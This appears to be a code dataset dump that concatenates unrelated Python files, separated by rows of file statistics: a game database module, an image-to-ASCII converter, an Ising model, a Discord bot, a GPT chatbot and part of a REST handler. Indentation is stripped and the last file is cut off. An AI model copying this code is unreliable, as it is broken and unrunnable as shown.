self.gdl_str = gdl_str
self.sm = sm
self.model = model
def get_sm(self):
return self.sm.dupe()
class GameInfoBypass(GameInfo):
''' bypass everything, special case statemachine that doesn't have any GDL '''
special_game = True
def __init__(self, game, sm, model):
self.game = game
self.sm = sm
self.model = model
def get_symbol_map(self):
pass
def lazy_load(self, the_game_store):
pass
def get_sm(self):
return self.sm.dupe()
###############################################################################
class LookupFailed(Exception):
pass
class GameDatabase:
def __init__(self, root_store):
self.root_store = root_store
self.rulesheets_store = root_store.get_directory("rulesheets")
self.games_store = root_store.get_directory("games", create=True)
self.idx_mapping = {}
self.game_mapping = {}
@property
def all_games(self):
return self.game_mapping.keys()
def load(self, verbose=True):
if verbose:
log.info("Building the database")
filenames = self.rulesheets_store.listdir("*.kif")
for fn in sorted(filenames):
# skip tmp files
if fn.startswith("tmp"):
continue
game = fn.replace(".kif", "")
# get the gdl
gdl_str = self.rulesheets_store.load_contents(fn)
info = GameInfo(game, gdl_str)
# first does the game directory exist?
the_game_store = self.games_store.get_directory(game, create=True)
if the_game_store.file_exists("sig.json"):
info.idx = the_game_store.load_json("sig.json")['idx']
else:
if verbose:
log.verbose("Creating signature for %s" % game)
info.get_symbol_map()
if info.symbol_map is None:
log.warning("FAILED to add: %s" % game)
raise Exception("FAILED TO add %s" % game)
# save as json
assert info.idx is not None
the_game_store.save_json("sig.json", dict(idx=info.idx))
assert info.idx is not None
if info.idx in self.idx_mapping:
other_info = self.idx_mapping[info.idx]
log.warning("DUPE GAMES: %s %s!=%s" % (info.idx, game, other_info.game))
raise Exception("Dupes not allowed in database")
self.idx_mapping[info.idx] = info
self.game_mapping[info.game] = info
def get_by_name(self, name):
if name not in self.game_mapping:
raise LookupFailed("Did not find game: %s" % name)
info = self.game_mapping[name]
if getattr(info, "special_game", False):
return info
# for side effects
info.get_symbol_map()
the_game_store = self.games_store.get_directory(name)
info.lazy_load(the_game_store)
return info
def lookup(self, gdl_str):
idx, sig = signature.get_index(gdl_str, verbose=False)
if idx not in self.idx_mapping:
raise LookupFailed("Did not find game : %s" % idx)
info = self.idx_mapping[idx]
info.get_symbol_map()
# create the symbol map for this gdl_str
symbol_map = signature.build_symbol_map(sig, verbose=False)
new_mapping = {}
# remap the roles back
roles = info.sigs.roles.items()
for ii in range(len(roles)):
match = "role%d" % ii
for k1, v1 in roles:
if v1 == match:
for k2, v2 in sig.roles.items():
if v2 == match:
new_mapping[k2] = k1
break
# remap the other symbols
for k1, v1 in info.symbol_map.items():
new_mapping[symbol_map[k1]] = v1
# remove if the keys/values all the same in new_mapping
all_same = True
for k, v in new_mapping.items():
if k != v:
all_same = False
break
if all_same:
new_mapping = None
# log.info("Lookup - found game %s in database" % info.game)
the_game_store = self.games_store.get_directory(info.game)
info.lazy_load(the_game_store)
return info, new_mapping
###############################################################################
def install_draughts(add_game):
' load custom c++ statemachine for draughts '
from ggplib import interface
from ggplib.non_gdl_games.draughts import desc, model
desc10 = desc.BoardDesc(10)
cpp_statemachines = interface.CppStateMachines()
model = model.create_sm_model(desc10)
for game_variant in ["draughts_10x10",
"draughts_killer_10x10",
"draughts_bt_10x10"]:
sm_create_meth = getattr(cpp_statemachines, game_variant)
add_game(game_variant, sm_create_meth(), model)
def install_hex(add_game):
' load custom c++ statemachine for draughts '
from ggplib import interface
from ggplib.non_gdl_games.hex.model import create_sm_model
cpp_statemachines = interface.CppStateMachines()
for sz in [9, 11, 13, 15, 19]:
cpp_sm = cpp_statemachines.get_hex(sz)
model = create_sm_model(sz)
add_game("hex_lg_%s" % sz, cpp_sm, model)
###############################################################################
# The API:
the_database = None
def get_database(verbose=True):
global the_database
def add_game_to_db(game, sm, model):
info = GameInfoBypass(game, sm, model)
the_database.game_mapping[game] = info
if the_database is None:
from ggplib.db.store import get_root
the_database = GameDatabase(get_root())
the_database.load(verbose=verbose)
try:
install_draughts(add_game_to_db)
except Exception as err:
log.error("Failed to install draughts: %s" % err)
try:
install_hex(add_game_to_db)
except Exception as err:
log.error("Failed to install hex: %s" % err)
return the_database
def get_all_game_names():
return get_database().all_games
# XXX build_sm not used.
def by_name(name, build_sm=True):
try:
db = get_database(verbose=False)
return db.get_by_name(name)
except Exception as exc:
# creates temporary files
msg = "Lookup of %s failed: %s" % (name, exc)
log.error(msg)
log.error(traceback.format_exc())
raise LookupFailed(msg)
def by_gdl(gdl):
try:
gdl_str = gdl
if not isinstance(gdl, str):
lines = []
for s in gdl:
lines.append(str(s))
gdl_str = "\n".join(lines)
db = get_database()
try:
info, mapping = db.lookup(gdl_str)
except LookupFailed as exc:
etype, value, tb = sys.exc_info()
traceback.print_exc()
raise LookupFailed("Did not find game %s" % exc)
return mapping, info
except Exception as exc:
# creates temporary files
log.error("Lookup failed: %s" % exc)
model, sm = builder.build_sm(gdl)
info = TempGameInfo("unknown", gdl, sm, model)
return None, info
| 28.206349
| 88
| 0.566798
| 1,113
| 8,885
| 4.330638
| 0.18239
| 0.021162
| 0.029876
| 0.009336
| 0.269917
| 0.228838
| 0.201037
| 0.154979
| 0.079046
| 0.058506
| 0
| 0.006455
| 0.319977
| 8,885
| 314
| 89
| 28.296178
| 0.791294
| 0.074733
| 0
| 0.257426
| 0
| 0
| 0.06699
| 0.00261
| 0
| 0
| 0
| 0
| 0.014851
| 1
| 0.108911
| false
| 0.024752
| 0.049505
| 0.024752
| 0.247525
| 0.004951
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e658277a9b24094cf1e76fa7c348cccc93b01df
| 7,352
|
py
|
Python
|
main.py
|
dogerish/pic2html
|
cca9d032fb2325cb8c220cd0f5f632235d0f8c94
|
[
"MIT"
] | null | null | null |
main.py
|
dogerish/pic2html
|
cca9d032fb2325cb8c220cd0f5f632235d0f8c94
|
[
"MIT"
] | null | null | null |
main.py
|
dogerish/pic2html
|
cca9d032fb2325cb8c220cd0f5f632235d0f8c94
|
[
"MIT"
] | null | null | null |
#! /usr/bin/python3
import sys, re
from PIL import Image
# return the argument if it exists (converted to the same type as the default), otherwise default
default = lambda arg, defa: type(defa)(sys.argv[arg]) if len(sys.argv) > arg and sys.argv[arg] else defa
# filename of image to evaluate, default is image.jpg
IMAGE = default(1, "image.jpg")
# filename of output, default just prints it to stdout
OUTPUT = default(2, "")
# outputs in defined way based on whether or not an output file is given
if OUTPUT == "": output = print
else:
def output(*args, **kwargs):
with open(OUTPUT, "w+") as ofile:
ofile.write(*args, **kwargs)
# output columns (width)
COLS = default(3, 200)
# color hues (degrees, [0-360))
COLORS = dict()
with open('colors.txt') as f:
# each line in the file
for line in f.readlines():
# means comment
if line.startswith('#'): continue
# name: hue saturation
# split bt name and values
line = line.split(':')
# split values with whitespace characters
line = [line[0], *line[1].strip().split('\t')]
# strip blank things from each piece
for i, piece in enumerate(line): line[i] = piece.strip()
# add key to COLORS
name, hue, sat = line
COLORS[name] = (None if hue == '*' else int(hue), None if sat == '*' else float(sat))
# characters for lightness values (ascending)
CHARS = " -+:!?%#&$@"
# color class
class Color:
def __init__(self, r=0, g=0, b=0, name=None):
self.r, self.g, self.b = r, g, b
self.vals = ('r', 'g', 'b')
self.name = name
# reduce the color to accumulator
def reduce(self, reducer, accumulator=0):
for v in self.vals:
accumulator = reducer(accumulator, getattr(self, v))
return accumulator
# executes f for each value of this color, returns a list of results
def for_each(self, f):
return [f(getattr(self, v)) for v in self.vals]
# executes f on each color value, returns list of results
def on_each(self, other, f):
return [f(getattr(self, v), getattr(other, v)) for v in self.vals]
# add with another color
def __add__(self, color2):
if type(color2) == Color:
return Color(*self.on_each(color2, lambda a, b: a + b))
else:
return Color(*self.for_each(lambda x: x + color2))
# multiply with another color
def __mul__(self, color2):
if type(color2) == Color:
return Color(*self.on_each(color2, lambda a, b: a * b))
else:
return Color(*self.for_each(lambda x: x * color2))
# subtract another color
def __sub__(self, color2):
return self + -1*color2
# divide by another color
def __truediv__(self, color2):
if type(color2) == Color:
return Color(*self.on_each(color2, lambda a, b: a / b))
else:
return Color(*self.for_each(lambda x: x / color2))
# get the difference between 2 colors (like subtraction but with no negatives)
def diff(self, color2):
return Color(*self.on_each(color2, lambda a, b: abs(a - b)))
# get the sum of the rgb values
def sum(self):
return self.reduce(lambda a, b: a + b)
# get the lightness of this color as a decimal percent
# 1 means brightest, 0 means darkest, 0.5 means middle...
def graylightness(self):
return self.sum() / 765
# returns the hsl version of this color
def hsl(self):
## setup
# normalized version of self
nself = self / 255
# rgb values
vals = nself.for_each(lambda x: x)
x, n = max(vals), min(vals) # max value
d = x - n # difference bt max and min
## hue
hue = 0;
if d == 0: pass # max and min same
elif x == nself.r: hue = 60*( (nself.g - nself.b) / d % 6 ) # r is max
elif x == nself.g: hue = 60*( (nself.b - nself.r) / d + 2 ) # g is max
else: hue = 60*( (nself.r - nself.g) / d + 4 ) # b is max
lightness = (x + n) / 2 ## lightness
saturation = 0 if d == 0 else d / (1 - abs(2*lightness - 1)) ## saturation
# add 360 to hue if it's negative
return (hue < 0)*360 + hue, saturation, lightness
# approximate a given color to be one of the colors listed in COLORS
# works by comparing hue values. lowest difference wins
def approx(self, hsl=None):
if hsl == None: hsl = self.hsl()
hue, sat = hsl[:2]
# the best one so far: (score, name, diff)
best = (None, None, None)
for name in COLORS.keys():
chue, csat = COLORS[name]
a, am, b, bm = 0, 2, 0, 2
# if hue does matter
if chue != None: a, bm = abs(hue - chue)/360, 1
# if saturation does matter
if csat != None: b, am = abs(sat - csat), 1
# sum of difference in hue and saturation is the score
score = a*am + b*bm
# if this is a new best score
if best[0] == None or score < best[0]:
best = (score, name)
# return the name of the best color
return best[1]
# color the string the color that the name describes
def color_str(self, string, colorName):
return f'<font color="{colorName}">{string}'
# where the output will be accumulated to
accumulator = '<body style="background-color: #000"><pre>'
# open the image
with Image.open(IMAGE) as img:
# the step to increment by each time
step = img.size[0] / COLS
# the vertical step, to account for characters not being squares
vstep = step * 15/7.81
# the current color
curcolor = None
# each row
for row in range(int(img.size[1]/vstep)):
row *= vstep
# add newline character to go to next row if this isn't the first row
accumulator += '\n'
# each column
for col in range(COLS):
col *= step
# average the colors for this location
avgcolor = Color()
colorc = 0 # color count
# within this tile/area
for y in range(int(row), int(row + vstep)):
for x in range(int(col), int(col + step)):
if x >= img.size[0]: break # break if it's out of range
# add this pixel's color to the average
avgcolor += Color(*img.getpixel((x, y)))
colorc += 1
if y >= img.size[1]: break # break if it's out of range
# turn sum into average
avgcolor /= colorc
# get the hsl version
hsl = avgcolor.hsl()
# approximate the color
apcolor = avgcolor.approx(hsl)
# pick the right character based on the lightness
char = CHARS[round(hsl[2]*(len(CHARS) - 1))]
# if it isn't already in the right color, change it
if apcolor != curcolor:
# add colored string to accumulator
accumulator += "</font>" + avgcolor.color_str(char, apcolor)
# new color
curcolor = apcolor
else:
# add character
accumulator += char
# end the elements
accumulator += "</font></pre></body>"
# output the result
output(accumulator)
| 37.131313
| 104
| 0.569777
| 1,043
| 7,352
| 3.985618
| 0.249281
| 0.004811
| 0.025259
| 0.016358
| 0.121482
| 0.1121
| 0.095502
| 0.095502
| 0.083474
| 0.075054
| 0
| 0.019604
| 0.320049
| 7,352
| 197
| 105
| 37.319797
| 0.811962
| 0.314608
| 0
| 0.070175
| 0
| 0
| 0.02943
| 0.010482
| 0
| 0
| 0
| 0
| 0
| 1
| 0.131579
| false
| 0.008772
| 0.017544
| 0.061404
| 0.298246
| 0.008772
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e6b5fa33d845c1a9c9c556d16d04f10c237dd56
| 3,401
|
py
|
Python
|
ising_model/hamiltonian.py
|
FeiQuantumSoftware/ising_model
|
6d8b177678aa953840fc01616dc7c789d9531b93
|
[
"BSD-3-Clause"
] | null | null | null |
ising_model/hamiltonian.py
|
FeiQuantumSoftware/ising_model
|
6d8b177678aa953840fc01616dc7c789d9531b93
|
[
"BSD-3-Clause"
] | null | null | null |
ising_model/hamiltonian.py
|
FeiQuantumSoftware/ising_model
|
6d8b177678aa953840fc01616dc7c789d9531b93
|
[
"BSD-3-Clause"
] | null | null | null |
"""coupling Hamiltonian class def"""
from math import exp
import numpy as np
from .spinconfig import SpinConfig
class Hamiltonian():
"""Create a class of Hamiltonian of 2-d Ising model.
Parameters
----------
J: float, optional
Coupling parameter, default J=-2 .
u: float, optional
External field strength, default u=1.1 .
Returns
-------
Hamiltonian: class
A Hamiltonian of a Ising model with J: coupling strength, u: external field factor.
Examples
--------
>>>ham = Hamiltonian(-2,1.1)
>>>ham. J
-2
"""
def __init__(self, J=-2, u=1.1):
self.u = u
self.J = J
def energy(self, spinlist):
"""Calculate the energy of a given spinconfiguration.
Parameters
----------
spinlist : list
Spin configuration represented in '1': spin up, '0': spin down.
Returns
-------
energy : float
Total energy out from both the external filed and coupling from neighbor spins.
Examples
--------
>>>ham = Hamiltonian(-2,1.1)
>>>ham. energy([0,1,0,1,1])
-4.9
"""
self.spinlist = spinlist
E = 0
# Energy from the external field:
# H_external = Sum over i of u * spin[i]
for eachspin in self.spinlist:
if eachspin == 1:
E += self.u * 1
elif eachspin == 0:
E += self.u * (-1)
else:
print("Spin input error")
# Energy from coupling the nearest neighbor spin:
# H_c = -J/k * spin[i] * spin[i+1]
newList = self.spinlist[1:]
newList.append(self.spinlist[0])
for spinx, spiny in zip(self.spinlist, newList):
if spinx == spiny:
E += -self.J * 1
elif spinx != spiny:
E += -self.J * (-1)
else:
print("Type error spininput")
return E
def average(self, T=1, N=0):
"""Calculate the oberservables of a given spin list with N sites.
Parameters
----------
T : float, optional
Temperature of the system.
N : interger, optional
The site number of a spin list.
Returns
-------
E, m, C, ms : set
Average energy, average magnetism, heat capacibility, magnetic susceptbility.
Examples
--------
>>>ham = Hamiltonian(-2,1.1)
>>>ham. average(10, 4)
(-1.894905381126034,
-0.29386784002835087,
0.17850826588133842,
0.26682385808137565)
"""
mySpin = SpinConfig(N)
Zsum = 0
E = 0
EE = 0
m = 0
mm = 0
for i in range(mySpin.iMax):
myspinlist = mySpin.input_decimal(i)
mi = mySpin.magnetization()
Ei = self.energy(myspinlist)
Zi = exp(-Ei/T)
Zsum += Zi
E += Zi * Ei
EE += Zi * Ei*Ei
m += Zi * mi
mm += Zi * mi * mi
# get average energy
E = E/Zsum
EE = EE/Zsum
# get average magnetism
m = m/Zsum
mm = mm/Zsum
# get capacity
C = (EE - E**2)/(T*T)
# get magnetic susceptibility
ms = (mm - m**2)/(T)
return E, m, C, ms
| 25.007353
| 91
| 0.486622
| 397
| 3,401
| 4.151134
| 0.307305
| 0.007282
| 0.040049
| 0.041869
| 0.071602
| 0.071602
| 0.050971
| 0
| 0
| 0
| 0
| 0.057309
| 0.39459
| 3,401
| 135
| 92
| 25.192593
| 0.743079
| 0.433108
| 0
| 0.078431
| 0
| 0
| 0.022945
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.058824
| 0
| 0.176471
| 0.039216
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e7096429698d4dbcba3e4c9717842932c8154f8
| 1,363
|
py
|
Python
|
app.py
|
IamSilentBot/Guardzilla
|
8ca9dcda2d99cba1628b708a770a34dd726acd9e
|
[
"MIT"
] | 1
|
2022-02-05T22:55:50.000Z
|
2022-02-05T22:55:50.000Z
|
app.py
|
IamSilentBot/Guardzilla
|
8ca9dcda2d99cba1628b708a770a34dd726acd9e
|
[
"MIT"
] | null | null | null |
app.py
|
IamSilentBot/Guardzilla
|
8ca9dcda2d99cba1628b708a770a34dd726acd9e
|
[
"MIT"
] | 1
|
2022-02-21T17:47:39.000Z
|
2022-02-21T17:47:39.000Z
|
import nextcord
from nextcord.ext import commands
import json
import os
import pymongo
import os
from keep_alive import keep_alive
# Set environment variables
# os.environ['info'] = "test:pass123"
# os.environ['TOKEN'] = "MY-AWSOME-TOKEN"
intents = nextcord.Intents.all()
TOKEN = os.environ['TOKEN']
async def prefix_d(_, message):
f = pymongo.MongoClient(
f"mongodb+srv://{os.environ['info']}@cluster0.o0xc5.mongodb.net/myFirstDatabase?retryWrites=true&w=majority")
cluster = f["Guardzilla"]
prefix = cluster["prefix"]
prefix_x = prefix.find_one({"_id": 0})
if not prefix_x or str(message.guild.id) not in prefix_x:
prefix.delete_one({"_id": 0})
prefix.insert_one({"_id": 0, str(message.guild.id): "."})
prefix_x = prefix.find_one({"_id": 0})
if str(message.content).startswith(prefix_x[str(message.guild.id)]):
return prefix_x[str(message.guild.id)]
else:
return str(client.user.id)
client = nextcord.ext.commands.Bot(
command_prefix=prefix_d, intents=intents, help_command=None)
@client.event
async def on_ready():
print(f'{client.user} has connected to Discord!')
for pyFile in os.listdir("./commands"):
if pyFile.endswith(".py"):
client.load_extension(f"commands.{pyFile[:-3]}")
print(f"{pyFile[:-3]} | Loaded")
keep_alive()
client.run(TOKEN)
| 27.816327
| 117
| 0.681585
| 192
| 1,363
| 4.713542
| 0.427083
| 0.046409
| 0.026519
| 0.075138
| 0.108287
| 0.108287
| 0.055249
| 0.055249
| 0
| 0
| 0
| 0.010508
| 0.162142
| 1,363
| 48
| 118
| 28.395833
| 0.781961
| 0.074101
| 0
| 0.117647
| 0
| 0.029412
| 0.186804
| 0.100954
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.205882
| 0
| 0.264706
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e73eaef843757f7ea7a8bbd35f9c54ff770774c
| 6,878
|
py
|
Python
|
chatbot/interact.py
|
VictorDebray/RoadBuddy
|
9c62e2acd2d540caa0ebefc50af5446c0d4f864f
|
[
"MIT"
] | null | null | null |
chatbot/interact.py
|
VictorDebray/RoadBuddy
|
9c62e2acd2d540caa0ebefc50af5446c0d4f864f
|
[
"MIT"
] | null | null | null |
chatbot/interact.py
|
VictorDebray/RoadBuddy
|
9c62e2acd2d540caa0ebefc50af5446c0d4f864f
|
[
"MIT"
] | null | null | null |
# Author: DINDIN Meryll
# Date: 15 September 2019
# Project: RoadBuddy
try: from chatbot.imports import *
except: from imports import *
class Contextualizer:
def __init__(self):
try:
self._load_models()
except:
drc = ['models', 'datasets']
for d in drc:
if not os.path.exists(d): os.mkdir(d)
self._download_models()
self._load_models()
def _download_models(self):
s3 = boto3.client('s3')
# Download dataset
fle = ('datasets.huggingface.co', 'personachat/personachat_self_original.json')
s3.download_file(*fle, 'datasets/persona-chat.json')
# Download model
fle = ('models.huggingface.co', 'transfer-learning-chatbot/finetuned_chatbot_gpt.tar.gz')
s3.download_file(fle, 'models/gpt.tar.gpz')
with tarfile.open('models/gpt.tar.gpz', 'r:gz') as archive: archive.extractall('models')
# Remove tar file
os.remove('models/gpt.tar.gpz')
def _load_models(self):
self.token = OpenAIGPTTokenizer.from_pretrained('models')
self.model = OpenAIGPTLMHeadModel.from_pretrained('models')
def tokenize_personnalities(self):
with open('datasets/persona-chat.json', encoding='utf-8') as f:
dtb = json.loads(f.read())
def tokenize(obj):
if isinstance(obj, str):
return self.token.convert_tokens_to_ids(self.token.tokenize(obj))
if isinstance(obj, dict):
return dict((n, tokenize(o)) for n, o in obj.items())
return list(tokenize(o) for o in obj)
dtb = tokenize(dtb)
torch.save(dtb, 'datasets/persona-cached')
class Trigger:
def __init__(self):
self.url_jokes = 'https://icanhazdadjoke.com'
self.url_facts = 'https://some-random-api.ml/facts'
def get(self, message):
if 'joke' in message:
return requests.get(self.url_jokes, headers={"Accept":"application/json"}).json()['joke']
elif ('fun' in message) and ('fact' in message):
animal = np.random.choice(['panda', 'cat', 'dog', 'fox', 'bird', 'koala'])
return json.loads(requests.get('/'.join([self.url_facts, animal])).content)['fact']
else: return ''
class Runner:
SPECIAL_TOKENS = ["<bos>", "<eos>", "<speaker1>", "<speaker2>", "<pad>"]
def __init__(self, directory='models'):
self.hists = []
self.trigs = Trigger()
self.token = OpenAIGPTTokenizer.from_pretrained(directory)
self.model = OpenAIGPTLMHeadModel.from_pretrained(directory)
def set_background(self, characteristics):
self.perso = [self.token.convert_tokens_to_ids(self.token.tokenize(e)) for e in characteristics]
def read_background(self):
for e in self.token.decode(chain(*self.perso)): print('-', e)
def input_from_segments(self, history, reply):
bos, eos, speaker1, speaker2 = self.token.convert_tokens_to_ids(self.SPECIAL_TOKENS[:-1])
instance = {}
sequence = [[bos] + list(chain(*self.perso))] + history + [reply]
sequence = [sequence[0]] + [[speaker2 if (len(sequence)-i) % 2 else speaker1] + s for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [speaker2 if i % 2 else speaker1 for i, s in enumerate(sequence) for _ in s]
instance["mc_token_ids"] = len(instance["input_ids"]) - 1
instance["lm_labels"] = [-1] * len(instance["input_ids"])
return instance, sequence
@staticmethod
def top_filtering(logits, top_k=0, top_p=0.9, threshold=-float('Inf'), filter_value=-float('Inf')):
assert logits.dim() == 1
top_k = min(top_k, logits.size(-1))
if top_k > 0:
# Remove all tokens with a probability less than the last token in the top-k tokens
indices_to_remove = logits < torch.topk(logits, top_k)[0][..., -1, None]
logits[indices_to_remove] = filter_value
if top_p > 0.0:
# Compute cumulative probabilities of sorted tokens
sorted_logits, sorted_indices = torch.sort(logits, descending=True)
cumulative_probabilities = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)
# Remove tokens with cumulative probability above the threshold
sorted_indices_to_remove = cumulative_probabilities > top_p
# Shift the indices to the right to keep also the first token above the threshold
sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()
sorted_indices_to_remove[..., 0] = 0
# Back to unsorted indices and set them to -infinity
indices_to_remove = sorted_indices[sorted_indices_to_remove]
logits[indices_to_remove] = filter_value
indices_to_remove = logits < threshold
logits[indices_to_remove] = filter_value
return logits
def sample_sequence(self, history, min_length=1, max_length=30, temperature=0.7, current_output=None):
special_tokens_ids = self.token.convert_tokens_to_ids(self.SPECIAL_TOKENS)
if current_output is None: current_output = []
for i in range(max_length):
instance, sequence = self.input_from_segments(history, current_output)
input_ids = torch.tensor(instance["input_ids"], device='cpu').unsqueeze(0)
token_type_ids = torch.tensor(instance["token_type_ids"], device='cpu').unsqueeze(0)
logits = self.model(input_ids, token_type_ids=token_type_ids)
logits = logits[0, -1, :] / temperature
logits = self.top_filtering(logits)
probs = F.softmax(logits, dim=-1)
prev = torch.multinomial(probs, 1)
if i < 1 and prev.item() in special_tokens_ids:
while prev.item() in special_tokens_ids:
prev = torch.multinomial(probs, num_samples=1)
if prev.item() in special_tokens_ids: break
current_output.append(prev.item())
return current_output
def answer(self, message, time=4):
self.hists.append(self.token.encode(message))
with torch.no_grad(): out_ids = self.sample_sequence(self.hists)
response = self.token.decode(out_ids, skip_special_tokens=True)
response = ' '.join([response, self.trigs.get(message)])
self.hists.append(self.token.encode(response))
self.hists = self.hists[-time:]
return response
| 38
| 126
| 0.604536
| 829
| 6,878
| 4.834741
| 0.289505
| 0.026946
| 0.041168
| 0.026198
| 0.202844
| 0.133234
| 0.062874
| 0.043912
| 0.043912
| 0
| 0
| 0.011457
| 0.276679
| 6,878
| 180
| 127
| 38.211111
| 0.794171
| 0.064117
| 0
| 0.063636
| 0
| 0
| 0.089494
| 0.033463
| 0
| 0
| 0
| 0
| 0.009091
| 1
| 0.127273
| false
| 0
| 0.018182
| 0
| 0.263636
| 0.009091
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e76f4bcaf6c2b3ef6bdb2c9d12ef79f80ffb1ec
| 13,152
|
py
|
Python
|
iceprod/server/rest/datasets.py
|
WIPACrepo/iceprod
|
83615da9b0e764bc2498ac588cc2e2b3f5277235
|
[
"MIT"
] | 2
|
2017-01-23T17:12:41.000Z
|
2019-01-14T13:38:17.000Z
|
iceprod/server/rest/datasets.py
|
WIPACrepo/iceprod
|
83615da9b0e764bc2498ac588cc2e2b3f5277235
|
[
"MIT"
] | 242
|
2016-05-09T18:46:51.000Z
|
2022-03-31T22:02:29.000Z
|
iceprod/server/rest/datasets.py
|
WIPACrepo/iceprod
|
83615da9b0e764bc2498ac588cc2e2b3f5277235
|
[
"MIT"
] | 2
|
2017-03-27T09:13:40.000Z
|
2019-01-27T10:55:30.000Z
|
import logging
import json
import uuid
from collections import defaultdict
import tornado.web
import tornado.httpclient
from tornado.platform.asyncio import to_asyncio_future
import pymongo
import motor
from rest_tools.client import RestClient
from iceprod.server.rest import RESTHandler, RESTHandlerSetup, authorization
from iceprod.server.util import nowstr, dataset_statuses, dataset_status_sort
logger = logging.getLogger('rest.datasets')
def setup(config, *args, **kwargs):
"""
Setup method for Dataset REST API.
Sets up any database connections or other prerequisites.
Args:
config (dict): an instance of :py:class:`iceprod.server.config`.
Returns:
list: Routes for dataset, which can be passed to :py:class:`tornado.web.Application`.
"""
cfg_rest = config.get('rest',{}).get('datasets',{})
db_cfg = cfg_rest.get('database',{})
# add indexes
db = pymongo.MongoClient(**db_cfg).datasets
if 'dataset_id_index' not in db.datasets.index_information():
db.datasets.create_index('dataset_id', name='dataset_id_index', unique=True)
handler_cfg = RESTHandlerSetup(config, *args, **kwargs)
handler_cfg.update({
'database': motor.motor_tornado.MotorClient(**db_cfg).datasets,
})
return [
(r'/datasets', MultiDatasetHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)', DatasetHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)/description', DatasetDescriptionHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)/status', DatasetStatusHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)/priority', DatasetPriorityHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)/jobs_submitted', DatasetJobsSubmittedHandler, handler_cfg),
(r'/dataset_summaries/status', DatasetSummariesStatusHandler, handler_cfg),
]
class BaseHandler(RESTHandler):
"""
Base handler for Dataset REST API.
"""
def initialize(self, database=None, **kwargs):
super(BaseHandler, self).initialize(**kwargs)
self.db = database
class MultiDatasetHandler(BaseHandler):
"""
Handle multi-group requests.
"""
@authorization(roles=['admin','client','system','user']) #TODO: figure out how to do auth for each dataset in the list
async def get(self):
"""
Get a dict of datasets.
Params (optional):
status: | separated list of status filters
groups: | separated list of groups to filter on
users: | separated list of users to filter on
keys: | separated list of keys to return for each dataset
Returns:
dict: {<dataset_id>: metadata}
"""
query = {}
status = self.get_argument('status', None)
if status:
query['status'] = {'$in': status.split('|')}
groups = self.get_argument('groups', None)
if groups:
query['group'] = {'$in': groups.split('|')}
users = self.get_argument('users', None)
if users:
query['username'] = {'$in': users.split('|')}
projection = {'_id': False}
keys = self.get_argument('keys', None)
if keys:
projection.update({x:True for x in keys.split('|') if x})
ret = {}
async for row in self.db.datasets.find(query, projection=projection):
k = row['dataset_id']
ret[k] = row
self.write(ret)
self.finish()
@authorization(roles=['admin','user']) # anyone should be able to create a dataset
async def post(self):
"""
Add a dataset.
Body should contain all necessary fields for a dataset.
"""
data = json.loads(self.request.body)
# validate first
req_fields = {
'description': str,
'jobs_submitted': int,
'tasks_submitted': int,
'tasks_per_job': int,
'group': str,
}
for k in req_fields:
if k not in data:
raise tornado.web.HTTPError(400, reason='missing key: '+k)
if not isinstance(data[k], req_fields[k]):
r = 'key "{}" should be of type {}'.format(k, req_fields[k].__name__)
raise tornado.web.HTTPError(400, reason=r)
opt_fields = {
'priority': int,
'debug': bool,
'jobs_immutable': bool,
'status': str,
}
for k in opt_fields:
if k in data and not isinstance(data[k], opt_fields[k]):
r = 'key "{}" should be of type {}'.format(k, opt_fields[k].__name__)
raise tornado.web.HTTPError(400, reason=r)
bad_fields = set(data).difference(set(opt_fields).union(req_fields))
if bad_fields:
r = 'invalid keys found'
raise tornado.web.HTTPError(400, reason=r)
if data['jobs_submitted'] == 0 and data['tasks_per_job'] <= 0:
r = '"tasks_per_job" must be > 0'
raise tornado.web.HTTPError(400, reason=r)
elif data['tasks_submitted'] != 0 and data['tasks_submitted'] / data['jobs_submitted'] != data['tasks_per_job']:
r = '"tasks_per_job" does not match "tasks_submitted"/"jobs_submitted"'
raise tornado.web.HTTPError(400, reason=r)
# generate dataset number
ret = await self.db.settings.find_one_and_update(
{'name': 'dataset_num'},
{'$inc': {'num': 1}},
projection={'num': True, '_id': False},
upsert=True,
return_document=pymongo.ReturnDocument.AFTER)
dataset_num = ret['num']
# set some fields
data['dataset_id'] = uuid.uuid1().hex
data['dataset'] = dataset_num
if 'status' not in data:
data['status'] = 'processing'
